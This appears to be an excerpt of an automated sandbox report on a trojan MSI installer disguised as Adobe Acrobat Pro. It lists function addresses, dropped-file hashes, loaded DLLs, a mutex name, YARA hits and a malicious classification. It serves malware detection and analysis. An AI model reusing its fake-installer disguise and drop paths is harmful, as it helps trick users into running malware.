Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1ADBB6B9	8_2_1ADBB6B9
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1ADB82B6	8_2_1ADB82B6
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1ADB42B4	8_2_1ADB42B4
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1ADB2A4E	8_2_1ADB2A4E
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1ADBC638	8_2_1ADBC638
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1ADBDE26	8_2_1ADBDE26
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1ADBBBC7	8_2_1ADBBBC7
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1ADB7F81	8_2_1ADB7F81
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1ADBC3B6	8_2_1ADBC3B6
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1ADBCBAE	8_2_1ADBCBAE
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1ADB2768	8_2_1ADB2768
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1ADB4B64	8_2_1ADB4B64
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1ADB80D9	8_2_1ADB80D9
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1ADBA0D6	8_2_1ADBA0D6
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1ADB48D4	8_2_1ADB48D4
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1ADB4C9C	8_2_1ADB4C9C
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1ADBD88D	8_2_1ADBD88D
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1ADBE454	8_2_1ADBE454
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1ADB114A	8_2_1ADB114A
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1ADBAD14	8_2_1ADBAD14
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1D050597	8_2_1D050597
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1CCA1877	8_2_1CCA1877
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1CC9C1E3	8_2_1CC9C1E3
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1CCA359A	8_2_1CCA359A
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1CC9719B	8_2_1CC9719B
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1CC9B949	8_2_1CC9B949
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1CCA112C	8_2_1CCA112C
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1CCA1EC8	8_2_1CCA1EC8
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1CC98695	8_2_1CC98695
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1CC9F20A	8_2_1CC9F20A
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1CC97A06	8_2_1CC97A06
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1CCA3239	8_2_1CCA3239
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1CC9F3D0	8_2_1CC9F3D0
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1CC99707	8_2_1CC99707
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1CCA0F23	8_2_1CCA0F23
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1CF1D9E3	8_2_1CF1D9E3
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1CF1D56F	8_2_1CF1D56F
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1CF1D9EF	8_2_1CF1D9EF
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1CB5F9A0	8_2_1CB5F9A0
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1C89C093	8_2_1C89C093
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1D071969	8_2_1D071969
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1D07072A	8_2_1D07072A
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1D06C200	8_2_1D06C200
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1D06B67B	8_2_1D06B67B
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1D0762CA	8_2_1D0762CA
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1CA4DCCC	8_2_1CA4DCCC
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1CA554D7	8_2_1CA554D7
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1CA4D5EA	8_2_1CA4D5EA
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1CA58D21	8_2_1CA58D21
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1CA52000	8_2_1CA52000
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1CA4B1BF	8_2_1CA4B1BF
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1CA5295B	8_2_1CA5295B
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1CA4FA1E	8_2_1CA4FA1E
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1CA56333	8_2_1CA56333
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1C70CF50	8_2_1C70CF50
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1CEE1CF8	8_2_1CEE1CF8
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1CED9480	8_2_1CED9480
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1CEDE855	8_2_1CEDE855
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1CED89DE	8_2_1CED89DE
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1CEDB995	8_2_1CEDB995
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1CEE116D	8_2_1CEE116D
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1CEDC2A5	8_2_1CEDC2A5
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1CEDD7C7	8_2_1CEDD7C7
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1CEDB70E	8_2_1CEDB70E
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1CB06C36	8_2_1CB06C36
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1CB06739	8_2_1CB06739
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1CB06957	8_2_1CB06957
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1D01F1BF	8_2_1D01F1BF
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1D020DC4	8_2_1D020DC4
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1D01C276	8_2_1D01C276
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1CFAC929	8_2_1CFAC929
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1CFAC990	8_2_1CFAC990
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1D0AB157	8_2_1D0AB157
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1CC060F8	8_2_1CC060F8
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1CC04889	8_2_1CC04889
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1CC10C06	8_2_1CC10C06
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1CC0D9E8	8_2_1CC0D9E8
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1CC0B1F8	8_2_1CC0B1F8
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1CC065FB	8_2_1CC065FB
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1CC0EDB0	8_2_1CC0EDB0
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1CC0C90D	8_2_1CC0C90D
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1CC01D1D	8_2_1CC01D1D
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1CC0FD1E	8_2_1CC0FD1E
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1CC086CD	8_2_1CC086CD
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1CC01AE9	8_2_1CC01AE9
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1CC0E641	8_2_1CC0E641
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1CC06666	8_2_1CC06666
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1CC07A37	8_2_1CC07A37
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1CC03783	8_2_1CC03783
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1CC0BB88	8_2_1CC0BB88
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1CC053AF	8_2_1CC053AF
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Code function: 8_2_1CC01F51	8_2_1CC01F51

Source: Joe Sandbox View	Dropped File: C:\Windows\Installer\MSIDD98.tmp 52F41817669AF7AC55B1516894EE705245C3148F2997FA0E6617E9CC6353E41E
Source: Joe Sandbox View	Dropped File: C:\Windows\Installer\MSIDE35.tmp 52F41817669AF7AC55B1516894EE705245C3148F2997FA0E6617E9CC6353E41E
Source: Joe Sandbox View	Dropped File: C:\Windows\Installer\MSIDE94.tmp 52F41817669AF7AC55B1516894EE705245C3148F2997FA0E6617E9CC6353E41E

Source: Adobe Acrobat Pro.exe.1.dr

Static PE information: Resource name: RT_RCDATA type: PE32 executable (console) Intel 80386, for MS Windows

Source: Adobe Acrobat Pro.exe.1.dr	Static PE information: Number of sections : 11 > 10
Source: avutil.dll.1.dr	Static PE information: Number of sections : 13 > 10

Source: Adobe_Acrobate_Reader_Pro-HAv70.msi

Binary or memory string: OriginalFilenameAICustAct.dllF vs Adobe_Acrobate_Reader_Pro-HAv70.msi

Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Section loaded: vsoscaler.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Section loaded: swscale.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Section loaded: idndl.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Section loaded: vsoscaler.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Section loaded: swscale.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Section loaded: idndl.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Section loaded: vsoscaler.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Section loaded: swscale.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Section loaded: idndl.dll	Jump to behavior

Source: classification engine

Classification label: mal96.troj.evad.winMSI@8/27@0/1

Source: C:\Windows\System32\msiexec.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\CMLE112.tmp

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe

Mutant created: \Sessions\1\BaseNamedObjects\gatuna2831

Source: C:\Windows\System32\msiexec.exe

File created: C:\Windows\TEMP\~DFFC63EC7295EC9676.TMP

Jump to behavior

Source: Yara match	File source: 00000003.00000000.1681304324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe, type: DROPPED

Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
